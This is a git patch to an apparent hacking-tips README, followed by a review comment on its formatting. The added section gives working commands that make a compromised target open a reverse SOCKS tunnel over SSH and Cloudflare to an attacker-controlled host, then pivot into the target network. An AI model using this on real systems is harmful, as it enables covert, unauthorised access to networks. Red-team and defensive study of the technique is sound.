From dd9d49ff54c29006679f730630ecd86ee9d34e14 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 6 Feb 2025 14:26:30 +0000 Subject: [PATCH] Update README.md --- README.md | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/README.md b/README.md index bb5bee3..1638d28 100644 --- a/README.md +++ b/README.md 
@@ -721,6 +721,34 @@ This also works in combination with: * [WireTap](https://github.com/sandialabs/wiretap) - Works as user or root. Uses UDP as transport. ([Try it](https://thc.org/segfault/wireguard) on segfault.) * [ligolo-ng](https://github.com/nicocha30/ligolo-ng) - Uses TCP as transport. Works well via [cloudflare CDN](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) or gs-netcat. +### Use SSH as a cheap reverse proxy via Cloudflare + +This method is similar to [HTTPS reverse tunnels](#https) but uses SSH instead of Gost or websocat. +- Advantage: Only uses *cloudflared* and *SSH* on the target. +- Disadvantage: Needs a CF subscription. + + 1. Go to your CF Dashboard -> Zero Trust -> Networks -> Tunnels + 2. Create a new 'Cloudflared' tunnel of any name. + 3. Select Debian & 64-bit. The Token is not fully shown. Extract the "Token" by copying the grayed out area into a separate document to reveal the entire Token (the long hex-strings after `sudo cloudflared service install `). + 4. Add a subdomain (example uses `ssh.team-teso.net`. Set Type=TCP URL=localhost:22 + +```shell +### On YOUR workstation: +cloudflared tunnel run --token TunnelTokenHere +``` + +```shell +### On the TARGET, create a reverse-SOCKS connection with SSH over Cloudflare: +ssh -o ProxyCommand="cloudflared access tcp --hostname ssh.team-teso.net" root@0 -R 1080 +``` + +```shell +### On your workstation, connect to _any_ host within the target network (example: ipinfo.io) +curl -x socks5h://0 https://ipinfo.io +``` +Use [ProxyChains or GrafTCP to tunnel](#scan-proxy) other protocols via the reverse proxy. + + --- **3.iv. Use any tool via Socks Proxy**
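Review bot: Step 4 of the added numbered list is malformed: the parenthesis opened at "(example uses `ssh.team-teso.net`." is never closed, and the two settings run together as "Set Type=TCP URL=localhost:22" with no separator or closing period. Suggest "Add a subdomain (example uses `ssh.team-teso.net`). Set Type=TCP and URL=localhost:22." In the last code block, `curl -x socks5h://0` names no port while the SSH line above it binds `-R 1080`; it only works because curl defaults SOCKS proxies to port 1080, so writing `socks5h://0:1080` would make the link between the two commands visible to the reader. Smaller points: the comment headers are inconsistent ("On YOUR workstation:" versus "On your workstation, ..."), step 3 calls the token "the long hex-strings" while the command uses the placeholder `TunnelTokenHere`, so one term for it would read better, and the hunk leaves two blank lines before the `---` separator where the rest of the context uses one.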